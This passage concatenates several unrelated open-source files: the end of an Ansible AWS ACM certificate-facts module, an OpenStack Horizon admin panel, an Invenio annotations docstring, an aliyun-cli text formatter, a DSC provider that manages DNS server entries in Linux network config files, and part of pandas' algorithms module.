type: string
sample: NO_AVAILABLE_CONTACTS
in_use_by:
description: A list of ARNs for the AWS resources that are using the certificate.
returned: always
sample: []
type: list
issued_at:
description: Date certificate was issued
returned: always
sample: '2017-01-01T00:00:00+10:00'
type: string
issuer:
description: Issuer of the certificate
returned: always
sample: Amazon
type: string
key_algorithm:
description: Algorithm used to generate the certificate
returned: always
sample: RSA-2048
type: string
not_after:
description: Date after which the certificate is not valid
returned: always
sample: '2019-01-01T00:00:00+10:00'
type: string
not_before:
description: Date before which the certificate is not valid
returned: always
sample: '2017-01-01T00:00:00+10:00'
type: string
renewal_summary:
description: Information about managed renewal process
returned: when certificate is issued by Amazon and a renewal has been started
type: complex
contains:
domain_validation_options:
description: Options used by ACM to validate the certificate
returned: when certificate type is AMAZON_ISSUED
type: complex
contains:
domain_name:
description: Fully qualified domain name of the certificate
returned: always
sample: example.com
type: string
validation_domain:
description: The domain name ACM used to send validation emails
returned: always
sample: example.com
type: string
validation_emails:
description: A list of email addresses that ACM used to send domain validation emails
returned: always
sample:
- admin@example.com
- postmaster@example.com
type: list
validation_status:
description: Validation status of the domain
returned: always
sample: SUCCESS
type: string
renewal_status:
description: Status of the domain renewal
returned: always
sample: PENDING_AUTO_RENEWAL
type: string
revocation_reason:
description: Reason for certificate revocation
returned: when the certificate has been revoked
sample: SUPERCEDED
type: string
revoked_at:
description: Date certificate was revoked
returned: when the certificate has been revoked
sample: '2017-09-01T10:00:00+10:00'
type: string
serial:
description: The serial number of the certificate
returned: always
sample: 00:01:02:03:04:05:06:07:08:09:0a:0b:0c:0d:0e:0f
type: string
signature_algorithm:
description: Algorithm used to sign the certificate
returned: always
sample: SHA256WITHRSA
type: string
status:
description: Status of the certificate in ACM
returned: always
sample: ISSUED
type: string
subject:
description: The name of the entity that is associated with the public key contained in the certificate
returned: always
sample: CN=*.example.com
type: string
subject_alternative_names:
description: Subject Alternative Names for the certificate
returned: always
sample:
- '*.example.com'
type: list
tags:
description: Tags associated with the certificate
returned: always
type: dict
sample:
Application: helloworld
Environment: test
type:
description: The source of the certificate
returned: always
sample: AMAZON_ISSUED
type: string
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, ec2_argument_spec, get_aws_connection_info
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, AWSRetry, HAS_BOTO3, boto3_tag_list_to_ansible_dict
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def list_certificates_with_backoff(client, statuses=None):
paginator = client.get_paginator('list_certificates')
kwargs = dict()
if statuses:
kwargs['CertificateStatuses'] = statuses
return paginator.paginate(**kwargs).build_full_result()['CertificateSummaryList']
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def get_certificate_with_backoff(client, certificate_arn):
response = client.get_certificate(CertificateArn=certificate_arn)
# strip out response metadata
return {'Certificate': response['Certificate'],
'CertificateChain': response['CertificateChain']}
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def describe_certificate_with_backoff(client, certificate_arn):
return client.describe_certificate(CertificateArn=certificate_arn)['Certificate']
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def list_certificate_tags_with_backoff(client, certificate_arn):
return client.list_tags_for_certificate(CertificateArn=certificate_arn)['Tags']
def get_certificates(client, module, name=None, statuses=None):
try:
all_certificates = list_certificates_with_backoff(client, statuses)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't obtain certificates",
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
if name:
certificates = [cert for cert in all_certificates
if cert['DomainName'] == name]
else:
certificates = all_certificates
results = []
for certificate in certificates:
try:
cert_data = describe_certificate_with_backoff(client, certificate['CertificateArn'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't obtain certificate metadata for domain %s" % certificate['DomainName'],
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
try:
cert_data.update(get_certificate_with_backoff(client, certificate['CertificateArn']))
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "RequestInProgressException":
module.fail_json(msg="Couldn't obtain certificate data for domain %s" % certificate['DomainName'],
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
cert_data = camel_dict_to_snake_dict(cert_data)
try:
tags = list_certificate_tags_with_backoff(client, certificate['CertificateArn'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't obtain tags for domain %s" % certificate['DomainName'],
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
cert_data['tags'] = boto3_tag_list_to_ansible_dict(tags)
results.append(cert_data)
return results
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(),
statuses=dict(type='list'),
)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_BOTO3:
module.fail_json('boto3 and botocore are required by this module')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='acm',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
except (botocore.exceptions.NoCredentialsError, botocore.exceptions.ProfileNotFound) as e:
module.fail_json(msg="Can't authorize connection - " + str(e))
certificates = get_certificates(client, module, name=module.params['name'], statuses=module.params['statuses'])
module.exit_json(certificates=certificates)
if __name__ == '__main__':
main()
| gpl-3.0 |
Solinea/horizon | openstack_dashboard/dashboards/admin/metadata_defs/panel.py | 30 | 1055 | #
# (c) Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.api import glance
from openstack_dashboard.dashboards.admin import dashboard
class MetadataDefinitions(horizon.Panel):
name = _("Metadata Definitions")
slug = 'metadata_defs'
permissions = ('openstack.roles.admin',)
if glance.VERSIONS.active >= 2:
dashboard.Admin.register(MetadataDefinitions)
| apache-2.0 |
egabancho/invenio | invenio/modules/annotations/__init__.py | 2 | 1656 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Annotations.
invenio.modules.annotations
---------------------------
**FIXME: Outdated documentation.**
To enable the module, make sure to remove it from ``PACKAGES_EXCLUDE``,
where it is placed by default.
To enable Web page annotations, add the following to your templates:
.. code-block:: jinja
{%- from "annotations/macros.html" import annotations_toolbar -%}
{%- block global_bundles -%}
{{ super() }}
{% bundle "30-annotations.js", "30-annotations.css" %}
{%- endblock global_javascript -%}
{%- block page_body -%}
{{ annotations_toolbar() }}
{{ super() }}
{%- endblock page_body -%}
To enable document annotations, along with the previewer, set the following
configuration variables to ``True``:
.. code-block:: python
ANNOTATIONS_NOTES_ENABLED = True
ANNOTATIONS_PREVIEW_ENABLED = True
"""
| gpl-2.0 |
blademainer/aliyun-cli | aliyuncli/text.py | 11 | 4478 | '''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import six
def format_text(data, stream):
_format_text(data, stream)
def _format_text(item, stream, identifier=None, scalar_keys=None):
if isinstance(item, dict):
_format_dict(scalar_keys, item, identifier, stream)
elif isinstance(item, list):
_format_list(item, identifier, stream)
else:
# If it's not a list or a dict, we just write the scalar
# value out directly.
stream.write(six.text_type(item))
stream.write('\n')
def _format_list(item, identifier, stream):
if not item:
return
if any(isinstance(el, dict) for el in item):
all_keys = _all_scalar_keys(item)
for element in item:
_format_text(element, stream=stream, identifier=identifier,
scalar_keys=all_keys)
elif any(isinstance(el, list) for el in item):
scalar_elements, non_scalars = _partition_list(item)
if scalar_elements:
_format_scalar_list(scalar_elements, identifier, stream)
for non_scalar in non_scalars:
_format_text(non_scalar, stream=stream,
identifier=identifier)
else:
_format_scalar_list(item, identifier, stream)
def _partition_list(item):
scalars = []
non_scalars = []
for element in item:
if isinstance(element, (list, dict)):
non_scalars.append(element)
else:
scalars.append(element)
return scalars, non_scalars
def _format_scalar_list(elements, identifier, stream):
if identifier is not None:
for item in elements:
stream.write('%s\t%s\n' % (identifier.upper(),
item))
else:
# For a bare list, just print the contents.
stream.write('\t'.join([six.text_type(item) for item in elements]))
stream.write('\n')
def _format_dict(scalar_keys, item, identifier, stream):
scalars, non_scalars = _partition_dict(item, scalar_keys=scalar_keys)
if scalars:
if identifier is not None:
scalars.insert(0, identifier.upper())
stream.write('\t'.join(scalars))
stream.write('\n')
for new_identifier, non_scalar in non_scalars:
_format_text(item=non_scalar, stream=stream,
identifier=new_identifier)
def _all_scalar_keys(list_of_dicts):
keys_seen = set()
for item_dict in list_of_dicts:
for key, value in item_dict.items():
if not isinstance(value, (dict, list)):
keys_seen.add(key)
return list(sorted(keys_seen))
def _partition_dict(item_dict, scalar_keys):
# Given a dictionary, partition it into two list based on the
# values associated with the keys.
# {'foo': 'scalar', 'bar': 'scalar', 'baz': ['not, 'scalar']}
# scalar = [('foo', 'scalar'), ('bar', 'scalar')]
# non_scalar = [('baz', ['not', 'scalar'])]
scalar = []
non_scalar = []
if scalar_keys is None:
# scalar_keys can have more than just the keys in the item_dict,
# but if user does not provide scalar_keys, we'll grab the keys
# from the current item_dict
for key, value in sorted(item_dict.items()):
if isinstance(value, (dict, list)):
non_scalar.append((key, value))
else:
scalar.append(six.text_type(value))
else:
for key in scalar_keys:
scalar.append(six.text_type(item_dict.get(key, '')))
remaining_keys = sorted(set(item_dict.keys()) - set(scalar_keys))
for remaining_key in remaining_keys:
non_scalar.append((remaining_key, item_dict[remaining_key]))
return scalar, non_scalar
| apache-2.0 |
MSFTOSSMgmt/WPSDSCLinux | Providers/Scripts/3.x/Scripts/nxDNSServerAddress.py | 2 | 10601 | #!/usr/bin/env python
#============================================================================
# Copyright (c) Microsoft Corporation. All rights reserved. See license.txt for license information.
#============================================================================
import os
import sys
import tempfile
import re
import platform
import imp
import socket
protocol=imp.load_source('protocol','../protocol.py')
"""
Ubuntu/Debian: /etc/network/interfaces:dns-nameservers 8.8.8.8 8.8.4.4
REDHAT/CENTOS: /etc/resolv.conf
nameserver 192.168.1.254
nameserver 8.8.8.8
SLES: /etc/sysconfig/network/config:NETCONFIG_DNS_STATIC_SEARCHLIST="<ipaddr1> <ipaddr2>"
[ClassVersion("1.0.0"), FriendlyName("nxDNSServerAddress")]
class MSFT_nxDNSServerAddressResource : OMI_BaseResource
{
[Key] string Address[];
[Write,ValueMap{"Ensure"},Values{"Present", "Absent"}] string Ensure;
[Write,ValueMap{"IPv4", "IPv6"},Values{"IPv4", "IPv6"}] string AddressFamily;
};
"""
def ValidateAddresses(Address,AddressFamily):
if len(Address)>3:
print("ERROR: Maximum of three entries for Address",sys.stderr)
return False
if 'IPv4' in AddressFamily:
ptype=socket.AF_INET
elif 'IPv6' in AddressFamily:
ptype=socket.AF_INET6
else:
return False
for a in Address:
try:
socket.inet_pton(ptype, a)
except:
return False
return True
def Set_Marshall(Address,Ensure,AddressFamily):
if Ensure == None or len(Ensure)<1:
Ensure='Present'
if AddressFamily == None or len(AddressFamily)<1:
AddressFamily='IPv4'
if ValidateAddresses(Address,AddressFamily) == False:
return [-1]
MyDistro=GetMyDistro()
retval = MyDistro.Set(Address,Ensure,AddressFamily)
return retval
def Test_Marshall(Address,Ensure,AddressFamily):
if Ensure == None or len(Ensure)<1:
Ensure='Present'
if AddressFamily == None or len(AddressFamily)<1:
AddressFamily='IPv4'
if ValidateAddresses(Address,AddressFamily) == False:
return [-1]
MyDistro=GetMyDistro()
retval= MyDistro.Test(Address,Ensure,AddressFamily)
return retval
def Get_Marshall(Address,Ensure,AddressFamily):
arg_names=list(locals().keys())
if Ensure == None or len(Ensure)<1:
Ensure='Present'
if AddressFamily == None or len(AddressFamily)<1:
AddressFamily='IPv4'
if ValidateAddresses(Address,AddressFamily) == False:
return [-1,Address,Ensure,AddressFamily]
retval = 0
MyDistro=GetMyDistro()
(retval, Address) = MyDistro.Get(Address,Ensure,AddressFamily)
Ensure = protocol.MI_String(Ensure.encode("utf-8"))
Address = protocol.MI_StringA(Address)
AddressFamily= protocol.MI_String(AddressFamily.encode("utf-8"))
retd={}
ld=locals()
for k in arg_names :
retd[k]=ld[k]
return retval, retd
def FindStringInFile(fname,matchs,multiline=False):
"""
Single line: return match object if found in file.
Multi line: return list of matches found in file.
"""
print("%s %s %s"%(fname,matchs,multiline),file=sys.stderr)
m=None
try:
if multiline:
ms=re.compile(matchs,re.S|re.M)
with (open(fname,'r')) as F:
l = F.read()
m=re.findall(ms,l)
else:
ms=re.compile(matchs)
with (open(fname,'r')) as F:
for l in F.readlines():
m=re.search(ms,l)
if m:
break
except:
raise
return m
def ReplaceStringInFile(fname,src,repl):
"""
Replace 'src' with 'repl' in file.
"""
updated=''
try:
sr=re.compile(src)
if FindStringInFile(fname,src):
for l in (open(fname,'r')).readlines():
n=re.sub(sr,repl,l)
if len(n)>2:
updated+=n
ReplaceFileContentsAtomic(fname,updated)
return True
except :
raise
return False
def AppendStringToFile(fname,s):
with (open(fname,'a')) as F:
F.write(s)
if s[-1] != '\n' :
F.write('\n')
F.close()
return True
def ReplaceFileContentsAtomic(filepath, contents):
"""
Write 'contents' to 'filepath' by creating a temp file, and replacing original.
"""
handle, temp = tempfile.mkstemp(dir = os.path.dirname(filepath))
if type(contents) == str :
contents=contents.encode('latin-1')
try:
os.write(handle, contents)
except IOError as e:
print('ReplaceFileContentsAtomic','Writing to file ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
return None
finally:
os.close(handle)
try:
os.rename(temp, filepath)
return None
except IOError as e:
print('ReplaceFileContentsAtomic','Renaming ' + temp+ ' to ' + filepath + ' Exception is ' +str(e),file=sys.stderr)
try:
os.remove(filepath)
except IOError as e:
print('ReplaceFileContentsAtomic','Removing '+ filepath + ' Exception is ' +str(e),file=sys.stderr)
try:
os.rename(temp,filepath)
except IOError as e:
print('ReplaceFileContentsAtomic','Removing '+ filepath + ' Exception is ' +str(e),file=sys.stderr)
return 1
return 0
def GetMyDistro(dist_class_name=''):
"""
Return MyDistro object.
"""
if dist_class_name == '':
if 'Linux' in platform.system():
Distro=platform.dist()[0]
else : # I know this is not Linux!
if 'FreeBSD' in platform.system():
Distro=platform.system()
Distro=Distro.strip('"')
Distro=Distro.strip(' ')
dist_class_name=Distro+'Distro'
else:
Distro=dist_class_name
if not dist_class_name in globals().keys():
print(Distro+' is not a supported distribution.')
return None
return globals()[dist_class_name]() # the distro class inside this module.
class AbstractDistro(object):
def __init__(self):
self.file='/etc/resolv.conf'
self.dns_srch='nameserver '
self.mode='single'
def get_addrs(self,addrs,mode):
line_list=FindStringInFile(self.file,'('+self.dns_srch+'.*?$)',True) # use multiline
naddrs=[]
if len(addrs) == 0:
for l in line_list:
l=l.replace(self.dns_srch,'')
l = l.strip('"')
l = l.strip("'")
l = l.strip('\n')
for a in l.split():
naddrs.append(a)
return naddrs
for a in addrs:
for l in line_list:
if a in l:
naddrs.append(a)
return naddrs
def add_addrs(self,addrs,mode):
# - TODO EXECPTION handlers
delim=''
if 'quoted' in mode:
delim='"'
if 'multi' in mode:
ReplaceStringInFile(self.file,'('+self.dns_srch+'.*)','')
for a in addrs:
AppendStringToFile(self.file,self.dns_srch+' '+a)
elif 'single' in mode:
ReplaceStringInFile(self.file,'('+self.dns_srch+'.*)',self.dns_srch+delim)
l=self.dns_srch
for a in addrs:
l+=a
l+=' '
if len(FindStringInFile(self.file,'('+self.dns_srch+'.*)',True)) == 0:
AppendStringToFile(self.file,l)
else:
ReplaceStringInFile(self.file,self.dns_srch,l)
return True
def del_addrs(self,addrs,mode):
delim=''
cur_addrs = self.get_addrs('',self.mode)
new_addrs = []
for c in cur_addrs:
if c not in addrs:
new_addrs.append(c)
if mode == 'multi':
ReplaceStringInFile(self.file,self.dns_srch+'.*','')
for a in new_addrs:
AppendStringToFile(self.file,self.dns_srch+' '+a)
elif 'single' in mode:
if 'quoted' in mode:
delim='"'
if len(new_addrs):
l=self.dns_srch
for a in new_addrs:
l+=a
l+=' '
l+=delim
else:
l=''
ReplaceStringInFile(self.file,self.dns_srch+'.*',l)
return True
def Set(self,addrs,Ensure,AddressFamily):
retval=[-1]
r=False
if Ensure=='Absent':
r=self.del_addrs(addrs,self.mode)
else:
r=self.add_addrs(addrs,self.mode)
if r:
retval=[0]
return retval
def Test(self,addrs,Ensure,AddressFamily):
if len(self.get_addrs(addrs,self.mode)) != len(addrs):
return [-1]
return [0]
def Get(self,addrs,Ensure,AddressFamily):
new_addrs=self.get_addrs(addrs,self.mode)
if len(new_addrs) == 0:
Ensure == 'Absent'
new_addrs=addrs
else:
Ensure == 'Present'
return 0,new_addrs
class SuSEDistro(AbstractDistro):
def __init__(self):
super(SuSEDistro,self).__init__()
self.file='/etc/sysconfig/network/config'
self.dns_srch='NETCONFIG_DNS_STATIC_SEARCHLIST="'
self.mode='single-quoted'
def Set(self,addrs,Ensure,AddressFamily):
return super(SuSEDistro,self).Set(addrs,Ensure,AddressFamily)
class debianDistro(AbstractDistro):
def __init__(self):
super(debianDistro,self).__init__()
self.file='/etc/network/interfaces'
self.dns_srch='dns-nameservers '
class redhatDistro(AbstractDistro):
def __init__(self):
super(redhatDistro,self).__init__()
self.mode='multi'
def Set(self,addrs,Ensure,AddressFamily):
return super(redhatDistro,self).Set(addrs,Ensure,AddressFamily)
class UbuntuDistro(debianDistro):
def __init__(self):
super(UbuntuDistro,self).__init__()
class LinuxMintDistro(UbuntuDistro):
def __init__(self):
super(LinuxMintDistro,self).__init__()
class fedoraDistro(redhatDistro):
def __init__(self):
super(fedoraDistro,self).__init__()
def Set(self,addrs,Ensure,AddressFamily):
return super(fedoraDistro,self).Set(addrs,Ensure,AddressFamily)
class centosDistro(redhatDistro):
def __init__(self):
super(centosDistro,self).__init__()
def Set(self,addrs,Ensure,AddressFamily):
return super(centosDistro,self).Set(addrs,Ensure,AddressFamily)
| mit |
DGrady/pandas | pandas/core/algorithms.py | 2 | 51643 | """
Generic data algorithms. This module is experimental at the moment and not
intended for public consumption
"""
from __future__ import division
from warnings import warn, catch_warnings
import numpy as np
from pandas import compat, _np_version_under1p8
from pandas.core.dtypes.cast import maybe_promote
from pandas.core.dtypes.generic import (
ABCSeries, ABCIndex,
ABCIndexClass, ABCCategorical)
from pandas.core.dtypes.common import (
is_unsigned_integer_dtype, is_signed_integer_dtype,
is_integer_dtype, is_complex_dtype,
is_object_dtype,
is_categorical_dtype, is_sparse,
is_period_dtype,
is_numeric_dtype, is_float_dtype,
is_bool_dtype, needs_i8_conversion,
is_categorical, is_datetimetz,
is_datetime64_any_dtype, is_datetime64tz_dtype,
is_timedelta64_dtype, is_interval_dtype,
is_scalar, is_list_like,
_ensure_platform_int, _ensure_object,
_ensure_float64, _ensure_uint64,
_ensure_int64)
from pandas.compat.numpy import _np_version_under1p10
from pandas.core.dtypes.missing import isna
from pandas.core import common as com
from pandas._libs import algos, lib, hashtable as htable
from pandas._libs.tslib import iNaT
# --------------- #
# dtype access #
# --------------- #
def _ensure_data(values, dtype=None):
"""
routine to ensure that our data is of the correct
input dtype for lower-level routines
This will coerce:
- ints -> int64
- uint -> uint64
- bool -> uint64 (TODO this should be uint8)
- datetimelike -> i8
- datetime64tz -> i8 (in local tz)
- categorical -> codes
Parameters
----------
values : array-like
dtype : pandas_dtype, optional
coerce to this dtype
Returns
-------
(ndarray, pandas_dtype, algo dtype as a string)
"""
# we check some simple dtypes first
try:
if is_object_dtype(dtype):
return _ensure_object(np.asarray(values)), 'object', 'object'
if is_bool_dtype(values) or is_bool_dtype(dtype):
# we are actually coercing to uint64
# until our algos suppport uint8 directly (see TODO)
return np.asarray(values).astype('uint64'), 'bool', 'uint64'
elif is_signed_integer_dtype(values) or is_signed_integer_dtype(dtype):
return _ensure_int64(values), 'int64', 'int64'
elif (is_unsigned_integer_dtype(values) or
is_unsigned_integer_dtype(dtype)):
return _ensure_uint64(values), 'uint64', 'uint64'
elif is_float_dtype(values) or is_float_dtype(dtype):
return _ensure_float64(values), 'float64', 'float64'
elif is_object_dtype(values) and dtype is None:
return _ensure_object(np.asarray(values)), 'object', 'object'
elif is_complex_dtype(values) or is_complex_dtype(dtype):
# ignore the fact that we are casting to float
# which discards complex parts
with catch_warnings(record=True):
values = _ensure_float64(values)
return values, 'float64', 'float64'
except (TypeError, ValueError):
# if we are trying to coerce to a dtype
# and it is incompat this will fall thru to here
return _ensure_object(values), 'object', 'object'
# datetimelike
if (needs_i8_conversion(values) or
is_period_dtype(dtype) or
is_datetime64_any_dtype(dtype) or
is_timedelta64_dtype(dtype)):
if is_period_dtype(values) or is_period_dtype(dtype):
from pandas import PeriodIndex
values = PeriodIndex(values)
dtype = values.dtype
elif is_timedelta64_dtype(values) or is_timedelta64_dtype(dtype):
from pandas import TimedeltaIndex
values = TimedeltaIndex(values)
dtype = values.dtype
else:
# Datetime
from pandas import DatetimeIndex
values = DatetimeIndex(values)
dtype = values.dtype
return values.asi8, dtype, 'int64'
elif (is_categorical_dtype(values) and
(is_categorical_dtype(dtype) or dtype is None)):
values = getattr(values, 'values', values)
values = values.codes
dtype = 'category'
# we are actually coercing to int64
# until our algos suppport int* directly (not all do)
values = _ensure_int64(values)
return values, dtype, 'int64'
# we have failed, return object
values = np.asarray(values)
return _ensure_object(values), 'object', 'object'
def _reconstruct_data(values, dtype, original):
"""
reverse of _ensure_data
Parameters
----------
values : ndarray
dtype : pandas_dtype
original : ndarray-like
Returns
-------
Index for extension types, otherwise ndarray casted to dtype
"""
from pandas import Index
if is_categorical_dtype(dtype):
pass
elif is_datetime64tz_dtype(dtype) or is_period_dtype(dtype):
values = Index(original)._shallow_copy(values, name=None)
elif is_bool_dtype(dtype):
values = values.astype(dtype)
# we only support object dtypes bool Index
if isinstance(original, Index):
values = values.astype(object)
elif dtype is not None:
values = values.astype(dtype)
return values
def _ensure_arraylike(values):
"""
ensure that we are arraylike if not already
"""
if not isinstance(values, (np.ndarray, ABCCategorical,
ABCIndexClass, ABCSeries)):
inferred = lib.infer_dtype(values)
if inferred in ['mixed', 'string', 'unicode']:
if isinstance(values, tuple):
values = list(values)
values = lib.list_to_object_array(values)
else:
values = np.asarray(values)
return values
_hashtables = {
'float64': (htable.Float64HashTable, htable.Float64Vector),
'uint64': (htable.UInt64HashTable, htable.UInt64Vector),
'int64': (htable.Int64HashTable, htable.Int64Vector),
'string': (htable.StringHashTable, htable.ObjectVector),
'object': (htable.PyObjectHashTable, htable.ObjectVector)
}
def _get_hashtable_algo(values):
"""
Parameters
----------
values : arraylike
Returns
-------
tuples(hashtable class,
vector class,
values,
dtype,
ndtype)
"""
values, dtype, ndtype = _ensure_data(values)
if ndtype == 'object':
# its cheaper to use a String Hash Table than Object
if lib.infer_dtype(values) in ['string']:
ndtype = 'string'
else:
ndtype = 'object'
htable, table = _hashtables[ndtype]
return (htable, table, values, dtype, ndtype)
def _get_data_algo(values, func_map):
if is_categorical_dtype(values):
values = values._values_for_rank()
values, dtype, ndtype = _ensure_data(values)
if ndtype == 'object':
# its cheaper to use a String Hash Table than Object
if lib.infer_dtype(values) in ['string']:
ndtype = 'string'
f = func_map.get(ndtype, func_map['object'])
return f, values
# --------------- #
# top-level algos #
# --------------- #
def match(to_match, values, na_sentinel=-1):
"""
Compute locations of to_match into values
Parameters
----------
to_match : array-like
values to find positions of
values : array-like
Unique set of values
na_sentinel : int, default -1
Value to mark "not found"
Examples
--------
Returns
-------
match : ndarray of integers
"""
values = com._asarray_tuplesafe(values)
htable, _, values, dtype, ndtype = _get_hashtable_algo(values)
to_match, _, _ = _ensure_data(to_match, dtype)
table = htable(min(len(to_match), 1000000))
table.map_locations(values)
result = table.lookup(to_match)
if na_sentinel != -1:
# replace but return a numpy array
# use a Series because it handles dtype conversions properly
from pandas import Series
result = Series(result.ravel()).replace(-1, na_sentinel).values.\
reshape(result.shape)
return result
def unique(values):
"""
Hash table-based unique. Uniques are returned in order
of appearance. This does NOT sort.
Significantly faster than numpy.unique. Includes NA values.
Parameters
----------
values : 1d array-like
Returns
-------
unique values.
- If the input is an Index, the return is an Index
- If the input is a Categorical dtype, the return is a Categorical
- If the input is a Series/ndarray, the return will be an ndarray
Examples
--------
>>> pd.unique(pd.Series([2, 1, 3, 3]))
array([2, 1, 3])
>>> pd.unique(pd.Series([2] + [1] * 5))
array([2, 1])
>>> pd.unique(Series([pd.Timestamp('20160101'),
... pd.Timestamp('20160101')]))
array(['2016-01-01T00:00:00.000000000'], dtype='datetime64[ns]')
>>> pd.unique(pd.Series([pd.Timestamp('20160101', tz='US/Eastern'),
... pd.Timestamp('20160101', tz='US/Eastern')]))
array([Timestamp('2016-01-01 00:00:00-0500', tz='US/Eastern')],
dtype=object)
>>> pd.unique(pd.Index([pd.Timestamp('20160101', tz='US/Eastern'),
... pd.Timestamp('20160101', tz='US/Eastern')]))
DatetimeIndex(['2016-01-01 00:00:00-05:00'],
... dtype='datetime64[ns, US/Eastern]', freq=None)
>>> pd.unique(list('baabc'))
array(['b', 'a', 'c'], dtype=object)
An unordered Categorical will return categories in the
order of appearance.
>>> pd.unique(Series(pd.Categorical(list('baabc'))))
[b, a, c]
Categories (3, object): [b, a, c]
>>> pd.unique(Series(pd.Categorical(list('baabc'),
... categories=list('abc'))))
[b, a, c]
Categories (3, object): [b, a, c]
An ordered Categorical preserves the category ordering.
>>> pd.unique(Series(pd.Categorical(list('baabc'),
... categories=list('abc'),
... ordered=True)))
[b, a, c]
Categories (3, object): [a < b < c]
An array of tuples
>>> pd.unique([('a', 'b'), ('b', 'a'), ('a', 'c'), ('b', 'a')])
array([('a', 'b'), ('b', 'a'), ('a', 'c')], dtype=object)
See Also
--------
pandas.Index.unique
pandas.Series.unique
"""
values = _ensure_arraylike(values)
# categorical is a fast-path
# this will coerce Categorical, CategoricalIndex,
# and category dtypes Series to same return of Category
if is_categorical_dtype(values):
values = getattr(values, '.values', values)
return values.unique()
original = values
htable, _, values, dtype, ndtype = _get_hashtable_algo(values)
table = htable(len(values))
uniques = table.unique(values)
uniques = _reconstruct_data(uniques, dtype, original)
if isinstance(original, ABCSeries) and is_datetime64tz_dtype(dtype):
# we are special casing datetime64tz_dtype
# to return an object array of tz-aware Timestamps
# TODO: it must return DatetimeArray with tz in pandas 2.0
uniques = uniques.asobject.values
return uniques
unique1d = unique
def isin(comps, values):
"""
Compute the isin boolean array
Parameters
----------
comps: array-like
values: array-like
Returns
-------
boolean array same length as comps
"""
if not is_list_like(comps):
raise TypeError("only list-like objects are allowed to be passed"
" to isin(), you passed a "
"[{0}]".format(type(comps).__name__))
if not is_list_like(values):
raise TypeError("only list-like objects are allowed to be passed"
" to isin(), you passed a "
"[{0}]".format(type(values).__name__))
if not isinstance(values, (ABCIndex, ABCSeries, np.ndarray)):
values = lib.list_to_object_array(list(values))
comps, dtype, _ = _ensure_data(comps)
values, _, _ = _ensure_data(values, dtype=dtype)
# GH11232
# work-around for numpy < 1.8 and comparisions on py3
# faster for larger cases to use np.in1d
f = lambda x, y: htable.ismember_object(x, values)
# GH16012
# Ensure np.in1d doesn't get object types or it *may* throw an exception
if ((_np_version_under1p8 and compat.PY3) or len(comps) > 1000000 and
not is_object_dtype(comps)):
f = lambda x, y: np.in1d(x, y)
elif is_integer_dtype(comps):
try:
values = values.astype('int64', copy=False)
comps = comps.astype('int64', copy=False)
f = lambda x, y: htable.ismember_int64(x, y)
except (TypeError, ValueError):
values = values.astype(object)
comps = comps.astype(object)
elif is_float_dtype(comps):
try:
values = values.astype('float64', copy=False)
comps = comps.astype('float64', copy=False)
checknull = isna(values).any()
f = lambda x, y: htable.ismember_float64(x, y, checknull)
except (TypeError, ValueError):
values = values.astype(object)
comps = comps.astype(object)
return f(comps, values)
def factorize(values, sort=False, order=None, na_sentinel=-1, size_hint=None):
"""
Encode input values as an enumerated type or categorical variable
Parameters
----------
values : ndarray (1-d)
Sequence
sort : boolean, default False
Sort by values
na_sentinel : int, default -1
Value to mark "not found"
size_hint : hint to the hashtable sizer
Returns
-------
labels : the indexer to the original array
uniques : ndarray (1-d) or Index
the unique values. Index is returned when passed values is Index or
Series
note: an array of Periods will ignore sort as it returns an always sorted
PeriodIndex
"""
values = _ensure_arraylike(values)
original = values
values, dtype, _ = _ensure_data(values)
(hash_klass, vec_klass), values = _get_data_algo(values, _hashtables)
table = hash_klass(size_hint or len(values))
uniques = vec_klass()
check_nulls = not is_integer_dtype(original)
labels = table.get_labels(values, uniques, 0, na_sentinel, check_nulls)
labels = _ensure_platform_int(labels)
